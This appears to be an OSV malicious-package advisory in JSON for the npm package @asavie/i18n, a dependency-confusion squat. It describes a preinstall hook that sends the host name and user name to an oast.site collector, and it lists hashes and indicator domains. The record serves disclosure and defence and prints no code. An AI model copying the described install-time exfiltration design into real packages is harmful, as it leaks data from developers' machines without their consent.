{"id":"MAL-2026-4265","summary":"Malicious code in @asavie/i18n (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (d803002ee95ea92bdcb3a918e1be10930816db383ce2a58a6947afea84e04040)\n@asavie/i18n@99.0.0 is a dependency-confusion package targeting an unclaimed npm scope. Its package.json declares a `preinstall` hook that runs `node callback.js`, which on `npm install` reads `os.hostname()` and the output of `whoami` (callback.js L23, L28) and transmits them to the attacker-controlled out-of-band collector `d88r3mao12pqka8tg04gn4ychek66c3wj.oast.site` (an Interactsh subdomain) via both a DNS A-record lookup and an `https.get()` request with the data base64url-encoded into the subdomain (callback.js L21, L37, L46). Version `99.0.0` and the squat on the `@asavie` scope are the canonical dependency-confusion shape — any build that mistakenly resolves this scope from public npm leaks identifying host data to the publisher. The tarball additionally ships an unrelated ~123 MB `google-chrome-stable_current_amd64.deb` that is not referenced by any code path; it is not executed but represents either staging or registry abuse. Author claims of 'authorized research' are unverifiable by installers and do not change the installer-side outcome: unsolicited exfiltration of host identifiers on `npm install`.\n\n## Source: ossf-package-analysis (c72462533b89e20b39c2336d38a51d34b95330c056845b95a3b390740cadc803)\nThe OpenSSF Package Analysis project identified '@asavie/i18n' @ 99.0.1 (npm) as malicious.\n\nIt is considered malicious because:\n\n- The package communicates with a domain associated with malicious activity.\n\n- The package executes one or more commands associated with malicious behavior.\n","modified":"2026-05-26T06:01:51.669276117Z","published":"2026-05-23T14:52:50Z","database_specific":{"malicious-packages-origins":[{"versions":["99.0.1"],"import_time":"2026-05-23T15:28:34.273184353Z","source":"ossf-package-analysis","sha256":"c72462533b89e20b39c2336d38a51d34b95330c056845b95a3b390740cadc803","modified_time":"2026-05-23T15:10:47Z"},{"versions":["99.0.3"],"import_time":"2026-05-23T16:50:06.156630627Z","sha256":"c90149499c9faecb4948903496d7a99bd57f787ed20b7e4e0328d932cd89d96a","source":"ossf-package-analysis","modified_time":"2026-05-23T16:35:32Z"},{"versions":["99.0.0"],"id":"IN-MAL-2026-004342","import_time":"2026-05-26T05:52:24.76185584Z","sha256":"e4fec4f800c855729363575ea3ab7f2b6defc5aa0de71d2f1a5895a3db69bb27","source":"amazon-inspector","modified_time":"2026-05-23T14:52:50Z"},{"versions":["99.0.1"],"id":"IN-MAL-2026-004343","import_time":"2026-05-26T05:52:24.857316692Z","sha256":"3564af29bcc73620093aecb81252259e227011d411a609130c82c9004fb02586","source":"amazon-inspector","modified_time":"2026-05-23T15:00:31Z"},{"versions":["99.0.1"],"id":"IN-MAL-2026-004344","import_time":"2026-05-26T05:52:24.958276192Z","sha256":"7e403fc0ec28bb05f955dad212fb2b83e7f2143dddd57385b0beac5626fbd99d","source":"amazon-inspector","modified_time":"2026-05-23T15:00:32Z"},{"versions":["99.0.3"],"id":"IN-MAL-2026-004354","import_time":"2026-05-26T05:52:26.253325979Z","sha256":"96b50c34d5d5e18e0c6abe89f65dca503cbc25b831d29cf0862df0d3c6b464b1","source":"amazon-inspector","modified_time":"2026-05-23T15:59:33Z"},{"versions":["99.0.3"],"id":"IN-MAL-2026-004355","import_time":"2026-05-26T05:52:26.350803682Z","sha256":"a73d77d4aaaafa5e736bc16da0eedee95e34c5ad31edd3abee306c8c8015158b","source":"amazon-inspector","modified_time":"2026-05-23T15:59:33Z"},{"versions":["99.0.0"],"id":"IN-MAL-2026-004341","import_time":"2026-05-26T05:52:24.648092427Z","sha256":"d803002ee95ea92bdcb3a918e1be10930816db383ce2a58a6947afea84e04040","source":"amazon-inspector","modified_time":"2026-05-23T14:52:50Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@asavie/i18n/v/99.0.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@asavie/i18n/v/99.0.3"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@asavie/i18n/v/99.0.0"}],"affected":[{"package":{"name":"@asavie/i18n","ecosystem":"npm","purl":"pkg:npm/%40asavie%2Fi18n"},"versions":["99.0.1","99.0.3","99.0.0"],"database_specific":{"indicators":{"domains":["asavie-i18n.scan-9bd78a93bd58.scan.tfhvz0.d88r3mao12pqka8tg04gn4ychek66c3wj.oast.site"],"package_integrity":[{"filename":"i18n-99.0.1.tgz","hashes":{"sha512_sri":"sha512-dYrlHHgkJyc37sqj6jXlDc5sg91nYT0+Ax01Mf2jSDsxILyHf3VW4C5GOLZJk9NF3lzzJb6/U7yQLFd8WYhhXg==","sha1":"7986d67e9b1ca8c93b796d51b5d0f9d8de488dc2"}}],"evidence_files":[{"path":"callback.js","tlsh":"f74186b923f1433015a319d1075f6364026be297b921e9e074fd03484f476aed323ee9","sha256":"9ca346964801019aa05f2563d830f13878d5692cca17d896e9a23add9b4ae582"},{"path":"package.json","tlsh":"5ef0d4b49434993319f843d61678d14db029ed4fdc449d1f56c3058c936e5f3067d28d","sha256":"9d3252c9f72c9812b7ae69177001b915400849291d60663d63f8074128bbfe15"}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@asavie/i18n/MAL-2026-4265.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"},{"name":"OpenSSF: Package Analysis","contact":["https://github.com/ossf/package-analysis","https://openssf.slack.com/channels/package_analysis"],"type":"FINDER"}]}